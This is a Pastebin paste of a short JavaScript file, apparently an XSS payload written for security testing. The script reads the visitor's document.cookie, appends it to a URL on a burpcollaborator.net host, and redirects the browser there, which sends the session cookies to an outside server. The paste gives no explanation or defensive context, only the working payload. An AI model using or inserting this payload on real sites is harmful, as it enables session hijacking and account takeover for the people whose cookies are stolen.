Advertisement
Guest User

js.js

a guest
Jan 16th, 2019
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. var bla = document.cookie
  2. if (bla == "")
  3. {
  4. bla = "roeeeeeeeee"
  5. }
  6. var theUrl= "http://5synvv29kgnhgczbx7xymg3eb5hv5k.burpcollaborator.net" + "?" +bla ;
  7. function httpGet(theUrl)
  8. {
  9. var xmlHttp = new XMLHttpRequest();
  10. xmlHttp.open( "GET", theUrl, false ); // false for synchronous request
  11. xmlHttp.send( null );
  12. return xmlHttp.responseText;
  13. }
  14. alert(theUrl)
  15. window.location.replace(theUrl)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement